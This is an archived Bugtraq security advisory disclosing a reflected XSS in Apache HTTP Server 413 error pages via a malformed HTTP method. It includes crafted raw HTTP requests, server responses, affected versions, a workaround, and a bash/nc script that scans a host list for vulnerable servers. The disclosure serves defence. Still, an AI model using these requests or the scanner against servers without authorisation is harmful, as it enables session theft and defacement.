Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

PR07-37: XSS on Apache HTTP Server 413 error pages via malformed HTTP me

from [research] Network Security [Permanent Link]
Subject: PR07-37: XSS on Apache HTTP Server 413 error pages via malformed HTTP method
Date: 30 Nov 2007 16:17:45 -0000 
PR07-37: XSS on Apache HTTP Server 413 error pages via malformed HTTP method


Vulnerability found: 7 November 2007

Vendor contacted: 14 November 2007

Risk factor: N/A 

The reason why we didn't consider this vulnerability a security risk is because 
the attacker needs to force the victim's browser to submit a malformed HTTP 
method. 

Header injection has been demonstrated to be possible using Flash [1] [2], but 
might be dependent on vulnerable Flash plugins.

A relevant example published in the past is exploiting the Apache 'Expect' XSS 
[3] (CVE-2006-3918) using flash [4].

However, in this case we need to spoof the HTTP METHOD to a specially-crafted 
value.


Description: 

It is possible to cause Apache HTTP server to return client-supplied scripting 
code by submitting a malformed HTTP method which would actually carry the 
payload (i.e.: malicious JavaScript) and invalid length data in the form of 
either of the following:

 Two 'Content-length:' headers equals to zero. i.e.: "Content-Length: 
0[LF]Content-Length: 0"
 One 'Content-length:' header equals to two values. i.e.: "Content-length: 0, 0"
 One 'Content-length:' header equals to a negative value. i.e.: 
"Content-length: -1"
 One 'Content-length:' header equals to a large value. i.e.: "Content-length: 
9999999999999999999999999999999999999999999999"


Apache 2.X returns a '413 Request Entity Too Large' error, when submitting 
invalid length data. When probing for XSS on the error page returned by the 
server we have 3 possible string vectors:

 The 'Host:' header
 The URL
 The HTTP method

If we probe for XSS using the 'Host:' header, Apache correctly filters the 
angle brackets and replaces them with HTML entities:

REQUEST:

GET / HTTP/1.1
Host: <BADCHARS>
Connection: close
Content-length: -1
[LF]
[LF]


SERVER'S REPONSE:

HTTP/1.1 413 Request Entity Too Large
Date: Fri, 30 Nov 2007 12:40:19 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/<br />
does not allow request data with GET requests, or the amount of data provided in
the request exceeds the capacity limit.
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at &lt;badchars&gt; Port 
80</address>
</body></html>


Notice that '<BADCHARS>' gets replaced with '&lt;badchars&gt;'

If we probe for XSS using the URL, Apache ALSO correctly filters the angle 
brackets and replaces them with HTML entities:

REQUEST:

GET /<BADCHARS>/ HTTP/1.1
Host: target-domain.foo
Connection: close
Content-length: -1
[LF]
[LF]


SERVER'S RESPONSE:

HTTP/1.1 413 Request Entity Too Large
Date: Fri, 30 Nov 2007 12:41:17 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/&lt;BADCHARS&gt;/<br />
does not allow request data with GET requests, or the amount of data provided in
the request exceeds the capacity limit.
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at target-domain.foo Port 
80</address>
</body></html>


Again, '<BADCHARS>' gets replaced with '&lt;badchars&gt;'


However, if we probe for XSS using a malformed HTTP method, the angle brackets 
are NOT replaced with HTML entities:


REQUEST:

<BADCHARS> / HTTP/1.1
Host: target-domain.foo
Connection: close
Content-length: -1
[LF]
[LF]


SERVER'S RESPONSE:

HTTP/1.1 413 Request Entity Too Large
Date: Fri, 30 Nov 2007 12:42:46 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/<br />
does not allow request data with <BADCHARS> requests, or the amount of data 
provided in
the request exceeds the capacity limit.
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at target-domain.foo Port 
80</address>
</body></html>



The following script could be used to audit your network for vulnerable web 
servers:

#!/bin/bash
# PR07-37-scan
if [ $# -ne 1 ]
then
        echo "$0 <hosts-file>"
        exit
fi

for i in `cat $1`
do

if echo -en "<PROCHECKUP> / HTTP/1.1\nHost: $i\nConnection: 
close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 $i 80 | grep -i 
'<PROCHECKUP>' > /dev/null
then
        echo "$i is VULNERABLE!"
fi

done


Vulnerability successfully tested on (banners extracted from server headers):

Server: Apache/2.0.46 (Red Hat)
Server: Apache/2.0.51 (Fedora)
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7g
Server: Apache/2.2.3 (FreeBSD) mod_ssl/2.2.3 OpenSSL/0.9.7e-p1 DAV/2
Server: Apache/2.2.4 (Linux/SUSE)


Note: other versions might also be vulnerable.


Consequences: 

This type of attack can result in non-persistent defacement of the target site, 
or the redirection of confidential information (i.e. session IDs) to 
unauthorised third parties provided that a web browser is tricked to submit a 
malformed HTTP method.


Workaround:

Disable Apache's default 413 error pages by adding   'ErrorDocument 413' 
statement to the Apache config file.


References:

http://www.procheckup.com/Vulnerability_2007.php

[1] "Forging HTTP request headers with Flash"
http://archives.neohapsis.com/archives/bugtraq/2006-07/0425.html

[2] "HTTP Header Injection Vulnerabilities in the Flash Player Plugin"
http://download2.rapid7.com/r7-0026/

[3] "Unfiltered Header Injection in Apache 1.3.34/2.0.57/2.2.1"
http://www.securityfocus.com/archive/1/433280

[4] "More Expect Exploitation In Flash"
http://ha.ckers.org/blog/20071103/more-expect-exploitation-in-flash/


Credits: Adrian Pastor and Amir Azam of ProCheckUp Ltd (www.procheckup.com).

Special thanks go to Amit Klein and Joe Orton for providing such valuable 
feedback.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • PR07-37: XSS on Apache HTTP Server 413 error pages via malformed HTTP method, research <=
Previous by Date:  27Mhz based wireless security insecurities - Aka - "We know what you typed last summer", Max Moser
Next by Date:  QEMU code_gen_buffer overflow POC, TeLeMan
Previous by Thread:  27Mhz based wireless security insecurities - Aka - "We know what you typed last summer", Max Moser
Next by Thread:  QEMU code_gen_buffer overflow POC, TeLeMan
Indexes:  [Date] [Thread] [Top] [All Lists]